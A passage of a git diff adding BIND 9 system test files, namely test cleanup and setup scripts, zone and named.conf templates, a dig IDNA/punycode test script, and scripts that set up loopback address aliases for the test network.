"exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/idna/clean.sh b/bin/tests/system/idna/clean.sh new file mode 100644 index 0000000..f99ecb5 --- /dev/null +++ b/bin/tests/system/idna/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/idna/ns1/named.conf.in b/bin/tests/system/idna/ns1/named.conf.in new file mode 100644 index 0000000..df552bd --- /dev/null +++ b/bin/tests/system/idna/ns1/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { fd92:7065:b8e:ffff::1; }; + recursion no; + notify yes; + dnssec-validation no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/idna/ns1/root.db b/bin/tests/system/idna/ns1/root.db new file mode 100644 index 0000000..b43cc40 --- /dev/null +++ b/bin/tests/system/idna/ns1/root.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 +a.root-servers.nil. AAAA fd92:7065:b8e:ffff::1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 +ns2.example. AAAA fd92:7065:b8e:ffff::2 diff --git a/bin/tests/system/idna/setup.sh b/bin/tests/system/idna/setup.sh new file mode 100644 index 0000000..1dc06c2 --- /dev/null +++ b/bin/tests/system/idna/setup.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/idna/tests.sh b/bin/tests/system/idna/tests.sh new file mode 100644 index 0000000..e38736e --- /dev/null +++ b/bin/tests/system/idna/tests.sh @@ -0,0 +1,378 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +# Set known locale for the tests + +if locale -a | grep -qE "^C\\.(UTF-8|utf8)"; then + LC_ALL="C.UTF-8" +elif locale -a | grep -qE "^en_US\\.(UTF-8|utf8)"; then + LC_ALL="en_US.UTF-8" +fi +export LC_ALL + +# This set of tests check the behavior of the IDNA options in "dig". +# +# "dig" supports two IDNA-related options: +# +# +[no]idnin - Translates a domain name into punycode format before sending +# the query to the server. +# +# Should the input name be a punycode name, "dig +idnin" will also +# validate the punycode, rejecting it if it is invalid. +# +# +[no]idnout - Translates the received punycode domain names into appropriate +# unicode characters before displaying. +# +# The tests run "dig" against an authoritative server configured with a minimal +# root zone and nothing else. As a result, all queries will result in an +# NXDOMAIN. The server will return the qname sent, which "dig" will display +# according to the options selected. This returned string is compared with +# the qname originally sent. +# +# In the comments below, the following nomenclature (taken from RFC 5890) is +# used: +# +# A-label: Label comprising ASCII characters that starts xn-- and whose +# characters after the xn-- are a valid output of the Punycode +# algorithm. +# +# Fake A-label: An A-label whose characters after the xn-- are not valid +# Punycode output. +# +# U-label: Unicode (native character) form of a label. +# +# For the purpose of this test script, U-labels do not include labels that +# comprise purely ASCII characters, which are referred to as "ASCII-labels" +# here. Valid ASCII-labels comprise letters, digits and hyphens and do not +# start with a hyphen. +# +# References: +# 1. http://www.unicode.org/reports/tr46/#Deviations +# 2. http://www.unicode.org/reports/tr46/#IDNAComparison + +# Using dig insecure mode as we are not testing DNSSEC here +DIGCMD="$DIG -i -p ${PORT} @10.53.0.1" + +# Initialize test count and status return +n=0 +status=0 + + +# Function for extracting the qname from the response +# +# This is the first field in the line after the line starting +# ";; QUESTION SECTION:". +# +# The string returned includes the trailing period. + +qname() { + awk 'BEGIN { qs = 0; } \ + /;; QUESTION SECTION:/ { qs = 1; next; } \ + qs == 1 {sub(";", "", $1) ; print $1; exit 0; }' \ + $1 +} + +# Function for performing a test where "dig" is expected to succeed. +# +# $1 - Description of the test +# $2 - Dig command additional options +# $3 - Name being queried +# $4 - The name that is expected to be displayed by "dig". Note that names +# displayed by "dig" will always have a trailing period, so this +# parameter should have that period as well. + +idna_test() { + n=`expr $n + 1` + description=$1 + if [ "$2" != "" ]; then + description="${description}: $2" + fi + echo_i "$description ($n)" + + ret=0 + $DIGCMD $2 $3 > dig.out.$n 2>&1 + if [ $? -ne 0 ]; then + echo_i "failed: dig command returned non-zero status" + ret=1 + else + actual=`qname dig.out.$n` + if [ "$4" != "$actual" ]; then + echo_i "failed: expected answer $4, actual result $actual" + ret=1 + fi + fi + status=`expr $status + $ret` +} + +# Function for performing a test where "dig" is expected to fail +# +# $1 - Description of the test +# $2 - Dig command additional options +# $3 - Name being queried + +idna_fail() { + n=`expr $n + 1` + description=$1 + if [ "$2" != "" ]; then + description="${description}: $2" + fi + echo_i "$description ($n)" + + ret=0 + $DIGCMD $2 $3 > dig.out.$n 2>&1 + if [ $? -eq 0 ]; then + echo_i "failed: dig command unexpectedly succeeded" + ret=1 + fi + status=`expr $status + $ret` +} + +# Function to check that case is preserved for an all-ASCII label. +# +# Without IDNA support, case-preservation is the expected behavior. +# +# With IDNA support... not really. IDNA maps uppercase ASCII characters to +# their lower-case equivalent. When IDNA support in "dig" was updated to +# non-transitional IDNA 2008, the switch "+idnin" was added and made the default +# behaviour. This meant that the command "dig LocalhosT" (no command switches) +# sends the qname "localhost", a change in behavior from earlier versions. +# +# This was felt to be confusing to the significant number of users who are +# not interested in IDNA. For this reason, after "dig" passes the input qname +# through the IDNA conversion, is does a case-insensitive comparison with the +# result. If the two are the same, "dig" can conclude that the qname is +# entirely ASCII and is uses the entered string instead of the converted string +# as the qname. + +ascii_case_preservation_test() { + text="Checking valid ASCII label" + idna_test "$text" "" LocalhosT LocalhosT. + idna_test "$text" "+noidnin +noidnout" LocalhosT LocalhosT. + idna_test "$text" "+noidnin +idnout" LocalhosT LocalhosT. + idna_test "$text" "+idnin +noidnout" LocalhosT LocalhosT. + idna_test "$text" "+idnin +idnout" LocalhosT LocalhosT. +} + +# Function to perform the tests if IDNA is enabled. + +idna_enabled_test() { + echo_i "IDNA is enabled, all IDNA tests will be performed" + # Check that case is preserved on an ASCII label. + + ascii_case_preservation_test + + + # Test of a valid U-label + # + # +noidnin +noidnout: The label is sent as a unicode octet stream and dig + # will display the string in the \nnn format. + # +noidnin +idnout: As for the previous case. + # +idnin +noidnout: The label is converted to the xn-- format. "dig" + # displays the returned xn-- text. + # +idnin +idnout: The label is converted to the xn-- format. "dig" + # converts the returned xn-- string back to the original + # unicode text. + # + # Note that ASCII characters are converted to lower-case. + + text="Checking valid non-ASCII label" + idna_test "$text" "" "München" "M\195\188nchen." + idna_test "$text" "+noidnin +noidnout" "München" "M\195\188nchen." + idna_test "$text" "+noidnin +idnout" "München" "M\195\188nchen." + idna_test "$text" "+idnin +noidnout" "München" "xn--mnchen-3ya." + idna_test "$text" "+idnin +idnout" "München" "münchen." + + + # Tests of transitional processing of a valid U-label + # + # IDNA2003 introduced national character sets but, unfortunately, didn't + # support several characters properly. One of those was the German + # character "ß" (the "Eszett" or "sharp s"), which was interpreted as "ss". + # So the domain “faß.de†domain (for example) was processed as “fass.deâ€. + # + # This was corrected in IDNA2008, although some vendors that adopted this + # standard chose to keep the existing IDNA2003 translation for this + # character to prevent problems (e.g. people visiting www.faß.example would, + # under IDNA2003, go to www.fass.example but under IDNA2008 would end up at + # www.fa\195\159.example - a different web site). + # + # BIND has adopted a hard transition, so this test checks that these + # transitional mapping is not used. The tests are essentially the same as + # for the valid U-label. + + text="Checking that non-transitional IDNA processing is used" + idna_test "$text" "" "faß.de" "fa\195\159.de." + idna_test "$text" "+noidnin +noidnout" "faß.de" "fa\195\159.de." + idna_test "$text" "+noidnin +idnout" "faß.de" "fa\195\159.de." + idna_test "$text" "+idnin +noidnout" "faß.de" "xn--fa-hia.de." + idna_test "$text" "+idnin +idnout" "faß.de" "faß.de." + + # Another problem character. The final character in the first label mapped + # onto the Greek sigma character ("σ") in IDNA2003. + + text="Second check that non-transitional IDNA processing is used" + idna_test "$text" "" "βόλος.com" "\206\178\207\140\206\187\206\191\207\130.com." + idna_test "$text" "+noidnin +noidnout" "βόλος.com" "\206\178\207\140\206\187\206\191\207\130.com." + idna_test "$text" "+noidnin +idnout" "βόλος.com" "\206\178\207\140\206\187\206\191\207\130.com." + idna_test "$text" "+idnin +noidnout" "βόλος.com" "xn--nxasmm1c.com." + idna_test "$text" "+idnin +idnout" "βόλος.com" "βόλος.com." + + + + # Tests of a valid A-label (i.e. starting xn--) + # + # +noidnout: The string is sent as-is to the server and the returned qname + # is displayed in the same form. + # +idnout: The string is sent as-is to the server and the returned qname + # is displayed as the corresponding U-label. + # + # The "+[no]idnin" flag has no effect in these cases. + + text="Checking valid A-label" + idna_test "$text" "" "xn--nxasmq6b.com" "xn--nxasmq6b.com." + idna_test "$text" "+noidnin +noidnout" "xn--nxasmq6b.com" "xn--nxasmq6b.com." + idna_test "$text" "+noidnin +idnout" "xn--nxasmq6b.com" "βόλοσ.com." + idna_test "$text" "+idnin +noidnout" "xn--nxasmq6b.com" "xn--nxasmq6b.com." + idna_test "$text" "+idnin +idnout" "xn--nxasmq6b.com" "βόλοσ.com." + + # Test of valid A-label in locale that cannot display it + # + # +noidnout: The string is sent as-is to the server and the returned qname + # is displayed in the same form. + # +idnout: The string is sent as-is to the server and the returned qname + # is displayed as the corresponding A-label. + # + # The "+[no]idnout" flag has no effect in these cases. + saved_LC_ALL="${LC_ALL}" + LC_ALL="C" + text="Checking valid A-label in C locale" + label="xn--nxasmq6b.com" + if command -v idn2 >/dev/null && ! idn2 -d "$label" >/dev/null 2>/dev/null; then + idna_test "$text" "" "$label" "$label." + idna_test "$text" "+noidnin +noidnout" "$label" "$label." + idna_test "$text" "+noidnin +idnout" "$label" "$label." + idna_test "$text" "+idnin +noidnout" "$label" "$label." + idna_test "$text" "+idnin +idnout" "$label" "$label." + idna_test "$text" "+noidnin +idnout" "$label" "$label." + fi + LC_ALL="${saved_LC_ALL}" + + + + # Tests of invalid A-labels + # + # +noidnin: The label is sent as-is to the server and dig will display the + # returned fake A-label in the same form. + # +idnin: "dig" should report that the label is not correct. + # + # +[no]idnout: If the label makes it to the server (via +noidnin), "dig" + # should report an error if +idnout is specified. + + # The minimum length of a punycode A-label is 7 characters. Check that + # a shorter label is detected and rejected. + + text="Checking punycode label shorter than minimum valid length" + idna_test "$text" "" "xn--xx" "xn--xx." + idna_test "$text" "+noidnin +noidnout" "xn--xx" "xn--xx." + idna_fail "$text" "+noidnin +idnout" "xn--xx" + idna_fail "$text" "+idnin +noidnout" "xn--xx" + idna_fail "$text" "+idnin +idnout" "xn--xx" + + # Fake A-label - the string does not translate to anything. + + text="Checking fake A-label" + idna_test "$text" "" "xn--ahahah" "xn--ahahah." + idna_test "$text" "+noidnin +noidnout" "xn--ahahah" "xn--ahahah." + idna_fail "$text" "+noidnin +idnout" "xn--ahahah" + idna_fail "$text" "+idnin +noidnout" "xn--ahahah" + idna_fail "$text" "+idnin +idnout" "xn--ahahah" + + # Too long a label. The punycode string is too long (at 64 characters). + # BIND rejects such labels: with +idnin + + label="xn--xflod18hstflod18hstflod18hstflod18hstflod18hstflod18-1iejjjj" + text="Checking punycode label longer than maximum valid length" + idna_fail "$text" "" "$label" + idna_fail "$text" "+noidnin +noidnout" "$label" + idna_fail "$text" "+noidnin +idnout" "$label" + idna_fail "$text" "+idnin +noidnout" "$label" + idna_fail "$text" "+idnin +idnout" "$label" + + + + + # Tests of a valid unicode string but an invalid U-label (input) + # + # Symbols are not valid IDNA2008 names. Check whether dig rejects them + # when they are supplied on the command line to ensure no IDNA2003 + # fallbacks are in place. + # + # +noidnin: "dig" should send unicode octets to the server and display the + # returned qname in the same form. + # +idnin: "dig" should generate an error. + # + # The +[no]idnout options should not have any effect on the test. + + text="Checking invalid input U-label" + idna_test "$text" "" "√.com" "\226\136\154.com." + idna_test "$text" "+noidnin +noidnout" "√.com" "\226\136\154.com." + idna_test "$text" "+noidnin +idnout" "√.com" "\226\136\154.com." + idna_test "$text" "+idnin +noidnout" "√.com" "xn--19g.com." + idna_test "$text" "+idnin +idnout" "√.com" "√.com." + + # Tests of a valid unicode string but an invalid U-label (output) + # + # Symbols are not valid IDNA2008 names. Check whether dig rejects them + # when they are received in DNS responses to ensure no IDNA2003 fallbacks + # are in place. + # + # Note that "+idnin +noidnout" is not tested because libidn2 2.2.0+ parses + # Punycode more strictly than older versions and thus dig fails with that + # combination of options with libidn2 2.2.0+ but succeeds with older + # versions. + # + # +noidnout: "dig" should send the ACE string to the server and display the + # returned qname. + # +idnout: "dig" should generate an error. + # + # The +[no]idnin options should not have any effect on the test. + + text="Checking invalid output U-label" + idna_test "$text" "" "xn--19g" "xn--19g." + idna_test "$text" "+noidnin +noidnout" "xn--19g" "xn--19g." + idna_test "$text" "+noidnin +idnout" "xn--19g" "√." + idna_test "$text" "+idnin +idnout" "xn--19g" "√." +} + + +# Function to perform tests if IDNA is not enabled. + +idna_disabled_test() { + echo_i "IDNA is disabled, only case mapping tests will be performed" + ascii_case_preservation_test +} + + +# Main test begins here + +$FEATURETEST --with-idn +if [ $? -eq 0 ]; then + idna_enabled_test +else + idna_disabled_test +fi + +exit $status diff --git a/bin/tests/system/ifconfig.bat b/bin/tests/system/ifconfig.bat new file mode 100644 index 0000000..9520abc --- /dev/null +++ b/bin/tests/system/ifconfig.bat @@ -0,0 +1,49 @@ +echo off +rem +rem Copyright (C) Internet Systems Consortium, Inc. ("ISC") +rem +rem SPDX-License-Identifier: MPL-2.0 +rem +rem This Source Code Form is subject to the terms of the Mozilla Public +rem License, v. 2.0. If a copy of the MPL was not distributed with this +rem file, you can obtain one at https://mozilla.org/MPL/2.0/. +rem +rem See the COPYRIGHT file distributed with this work for additional +rem information regarding copyright ownership. + +rem ifconfig.bat +rem Set up interface aliases for bind9 system tests. +rem +rem IPv4: 10.53.0.{1..10} RFC 1918 +rem 10.53.1.{1..2} +rem 10.53.2.{1..2} +rem IPv6: fd92:7065:b8e:ffff::{1..10} ULA +rem fd92:7065:b8e:99ff::{1..2} +rem fd92:7065:b8e:ff::{1..2} +rem +echo Please adapt this script to your system +rem remove the following line when the script is ready +exit /b 1 + +rem for IPv4 adding these static addresses to a physical interface +rem will switch it from DHCP to static flushing DHCP setup. +rem So it is highly recommended to install the loopback pseudo-interface +rem and add IPv4 addresses to it. + +rem for IPv6 your interface can have a different name, e.g., +rem "Local Area Connection". Please update this script and remove the +rem exit line + +echo on + +FOR %%I IN (1,2,3,4,5,6,7,8,9,10) DO ( + netsh interface ipv4 add address name=Loopback 10.53.0.%%I 255.255.255.0 + netsh interface ipv6 add address interface=Loopback fd92:7065:b8e:ffff::%%I/64 +) +FOR %%I IN (1,2) DO ( + netsh interface ipv4 add address name=Loopback 10.53.1.%%I 255.255.255.0 + netsh interface ipv4 add address name=Loopback 10.53.2.%%I 255.255.255.0 + + netsh interface ipv6 add address interface=Loopback fd92:7065:b8e:99ff::%%I/64 + netsh interface ipv6 add address interface=Loopback fd92:7065:b8e:ff::%%I/64 +) diff --git a/bin/tests/system/ifconfig.sh b/bin/tests/system/ifconfig.sh new file mode 100755 index 0000000..8824c25 --- /dev/null +++ b/bin/tests/system/ifconfig.sh @@ -0,0 +1,271 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up interface aliases for bind9 system tests. +# +# IPv4: 10.53.0.{1..11} RFC 1918 +# 10.53.1.{1..2} +# 10.53.2.{1..2} +# IPv6: fd92:7065:b8e:ffff::{1..11} ULA +# fd92:7065:b8e:99ff::{1..2} +# fd92:7065:b8e:ff::{1..2} +# +# We also set the MTU on the 1500 bytes to match the default MTU on physical +# interfaces, so we can properly test the cases with packets bigger than +# interface MTU. + +SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)" +. "$SYSTEMTESTTOP/conf.sh" + +export SYSTEMTESTTOP + +sys=$($SHELL "$TOP/config.guess") + +use_ip= +case "$sys" in + *-*-linux*) + if type ip > /dev/null; then + use_ip=yes + elif type ifconfig > /dev/null; then + : + else + echo "$0: can't find ip or ifconfig" >&2 + exit 1 + fi + ;; +esac + +up() { + case "$sys" in + *-pc-solaris2.5.1) + [ "$a" ] && ifconfig lo0:$int $a netmask 0xffffffff up + ;; + *-sun-solaris2.[6-7]) + [ "$a" ] && ifconfig lo0:$int $a netmask 0xffffffff up + ;; + *-*-solaris2.[8-9]|*-*-solaris2.10) + [ "$a" ] && { + /sbin/ifconfig lo0:$int plumb + /sbin/ifconfig lo0:$int $a up + /sbin/ifconfig lo0:$int mtu 1500 + } + [ "$aaaa" ] && { + /sbin/ifconfig lo0:$int inet6 plumb + /sbin/ifconfig lo0:$int inet6 $aaaa up + } + ;; + *-*-solaris2.1[1-9]) + [ "$a" ] && { + /sbin/ipadm create-addr -t -T static \ + -a $a lo0/bind9v4$int || + echo failed lo0/bind9v4$int + } + [ "$aaaa" ] && { + /sbin/ipadm create-addr -t -T static \ + -a $aaaa lo0/bind9v6$int || + echo failed lo0/bind9v6$int + } + ;; + *-*-linux*) + if [ "$use_ip" ]; then + ip address add $a/24 dev lo:$int + ip link set dev lo:$int mtu 1500 + [ "$aaaa" ] && ip address add $aaaa/64 dev lo + else + ifconfig lo:$int $a up netmask 255.255.255.0 mtu 1500 + [ "$aaaa" ] && ifconfig lo inet6 add $aaaa/64 + fi + ;; + *-unknown-freebsd*) + [ "$a" ] && ifconfig lo0 $a alias netmask 0xffffffff mtu 1500 + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa alias + ;; + *-unknown-dragonfly*|*-unknown-netbsd*|*-unknown-openbsd*) + [ "$a" ] && ifconfig lo0 $a alias netmask 255.255.255.0 mtu 1500 + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa alias + ;; + *-*-bsdi[3-5].*) + [ "$a" ] && ifconfig lo0 add $a netmask 255.255.255.0 + ;; + *-dec-osf[4-5].*) + [ "$a" ] && ifconfig lo0 alias $a + ;; + *-sgi-irix6.*) + [ "$a" ] && ifconfig lo0 alias $a + ;; + *-*-sysv5uw7*|*-*-sysv*UnixWare*|*-*-sysv*OpenUNIX*) + [ "$a" ] && ifconfig lo0 $a alias netmask 0xffffffff + ;; + *-ibm-aix4.*|*-ibm-aix5.*) + [ "$a" ] && ifconfig lo0 alias $a + [ "$aaaa" ] && ifconfig lo0 inet6 alias -dad $aaaa/64 + ;; + hpux) + [ "$a" ] && ifconfig lo0:$int $a netmask 255.255.255.0 up + [ "$aaaa" ] && ifconfig lo0:$int inet6 $aaaa up + ;; + *-sco3.2v*) + [ "$a" ] && ifconfig lo0 alias $a + ;; + *-darwin*) + [ "$a" ] && ifconfig lo0 alias $a + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa alias + ;; + *-cygwin*) + echo "Please run ifconfig.bat as Administrator." + exit 1 + ;; + *) + echo "Don't know how to set up interface. Giving up." + exit 1 + ;; + esac +} + +down() { + case "$sys" in + *-pc-solaris2.5.1) + [ "$a" ] && ifconfig lo0:$int 0.0.0.0 down + ;; + *-sun-solaris2.[6-7]) + [ "$a" ] && ifconfig lo0:$int $a down + ;; + *-*-solaris2.[8-9]|*-*-solaris2.10) + [ "$a" ] && { + ifconfig lo0:$int $a down + ifconfig lo0:$int $a unplumb + } + [ "$aaaa" ] && { + ifconfig lo0:$int inet6 down + ifconfig lo0:$int inet6 unplumb + } + ;; + *-*-solaris2.1[1-9]) + [ "$a" ] && { + ipadm delete-addr lo0/bind9v4$int || + echo failed lo0/bind9v4$int + } + [ "$aaaa" ] && { + ipadm delete-addr lo0/bind9v6$int || + echo failed lo0/bind9v6$int + } + ;; + + *-*-linux*) + if [ "$use_ip" ]; then + [ "$a" ] && ip address del $a/24 dev lo:$int + [ "$aaaa" ] && ip address del $aaaa/64 dev lo + else + [ "$a" ] && ifconfig lo:$int $a down + [ "$aaaa" ] && ifconfig lo inet6 del $aaaa/64 + fi + ;; + *-unknown-freebsd*) + [ "$a" ] && ifconfig lo0 $a delete + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-unknown-netbsd*) + [ "$a" ] && ifconfig lo0 $a delete + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-unknown-openbsd*) + [ "$a" ] && ifconfig lo0 $a delete + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-*-bsdi[3-5].*) + [ "$a" ] && ifconfig lo0 remove $a + ;; + *-dec-osf[4-5].*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *-sgi-irix6.*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *-*-sysv5uw7*|*-*-sysv*UnixWare*|*-*-sysv*OpenUNIX*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *-ibm-aix4.*|*-ibm-aix5.*) + [ "$a" ] && ifconfig lo0 delete $a + [ "$aaaa" ] && ifconfig lo0 delete inet6 $aaaa/64 + ;; + hpux) + [ "$a" ] && ifconfig lo0:$int 0.0.0.0 + [ "$aaaa" ] && ifconfig lo0:$int inet6 :: + ;; + *-sco3.2v*) + [ "$a" ] && ifconfig lo0 -alias $a + ;; + *darwin*) + [ "$a" ] && ifconfig lo0 -alias $a + [ "$aaaa" ] && ifconfig lo0 inet6 $aaaa delete + ;; + *-cygwin*) + echo "Please run ifconfig.bat as Administrator." + exit 1 + ;; + *) + echo "Don't know how to destroy interface. Giving up." + exit 1 + ;; + esac +} + +sequence() ( + awk -v s=$1 -v e=$2 ' + BEGIN { + for (i = s ; i <= e; i++) { print i; } + exit; + }' +) + +# +# 'max', 'i' and 'ns' are used to compute the interface identifier for +# systems that need it and must be unique for each interface (e.g. lo:$int). +# +# int=$((i * max + ns)) +# +# 'max' is the number of nameservers configured in the inner loop. +# 'i' is the outer loop counter. +# 'ns' in the namserver being configured. +# 'int' interface identifier. +# +max=11 +case $1 in + start|up|stop|down) + for i in $(sequence 0 2) + do + case $i in + 0) ipv6="ff" ;; + 1) ipv6="99" ;; + 2) ipv6="00" ;; + *) ipv6="" ;; + esac + for ns in $(sequence 1 $max) + do + [ $i -gt 0 -a $ns -gt 2 ] && break + int=$((i * max + ns)) + a=10.53.$i.$ns + aaaa=fd92:7065:b8e:${ipv6}ff::$ns + case "$1" in + start|up) up;; + stop|down) down;; + esac + done + done + ;; + *) + echo "Usage: $0 { up | down }" + exit 1 + ;; +esac diff --git a/bin/tests/system/inline/clean.sh b/bin/tests/system/inline/clean.sh new file mode 100644 index 0000000..79f3774 --- /dev/null +++ b/bin/tests/system/inline/clean.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -rf ./*/*.jbk \ + ./*/*.nzd ./*/*.nzd-lock ./*/*.nzf \ + ./*/named.conf ./*/named.memstats ./*/named.run* ./*/named.lock \ + ./*/trusted.conf \ + ./K* ./*/K* \ + ./checkecdsa \ + ./freeze.test* thaw.test* \ + ./import.key \ + ././ns*/managed-keys.bind* ./ns*/*.mkeys* \ + ./*/dsset-* ./*/nzf-* \ + ./*/*.db ./*/*.db.signed ./*/*.db.jnl ./*/*.db.signed.jnl \ + ./*.out ./*.out* ./*/*.out ./*/*.out* \ + ./*/*.bk ./*/*.bk.jnl ./*/*.bk.signed ./*/*.bk.signed.jnl \ + ns3/a-file ns3/removedkeys diff --git a/bin/tests/system/inline/ns1/named.conf.in b/bin/tests/system/inline/ns1/named.conf.in new file mode 100644 index 0000000..da27c58 --- /dev/null +++ b/bin/tests/system/inline/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/inline/ns1/root.db.in b/bin/tests/system/inline/ns1/root.db.in new file mode 100644 index 0000000..915d95b --- /dev/null +++ b/bin/tests/system/inline/ns1/root.db.in @@ -0,0 +1,59 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +bits. NS ns3.bits. +bits. NS ns4.bits. +ns3.bits. A 10.53.0.3 +ns4.bits. A 10.53.0.4 + +noixfr. NS ns3.noixfr. +ns3.noixfr. A 10.53.0.3 + +master. NS ns3.master. +ns3.master. A 10.53.0.3 + +dynamic. NS ns3.dynamic. +ns3.dynamic. A 10.53.0.3 + +updated. NS ns3.updated. +ns3.updated. A 10.53.0.3 + +expired. NS ns3.expired. +ns3.expired. A 10.53.0.3 + +retransfer. NS ns3.retransfer. +ns3.retransfer. A 10.53.0.3 + +nsec3. NS ns3.nsec3. +ns3.nsec3. A 10.53.0.3 + +externalkey. NS ns3.externalkey. +ns3.externalkey. A 10.53.0.3 + +retransfer3. NS ns3.retransfer. +ns3.retransfer3. A 10.53.0.3 + +inactiveksk. NS ns3.inactiveksk. +ns3.inactiveksk. A 10.53.0.3 + +inactivezsk. NS ns3.inactivezsk. +ns3.inactivezsk. A 10.53.0.3 diff --git a/bin/tests/system/inline/ns1/sign.sh b/bin/tests/system/inline/ns1/sign.sh new file mode 100644 index 0000000..5e024c2 --- /dev/null +++ b/bin/tests/system/inline/ns1/sign.sh @@ -0,0 +1,26 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +rm -f K.+*+*.key +rm -f K.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$SIGNER -S -x -T 1200 -o ${zone} root.db > signer.out +[ $? = 0 ] || cat signer.out + +keyfile_to_static_ds $keyname > trusted.conf +cp trusted.conf 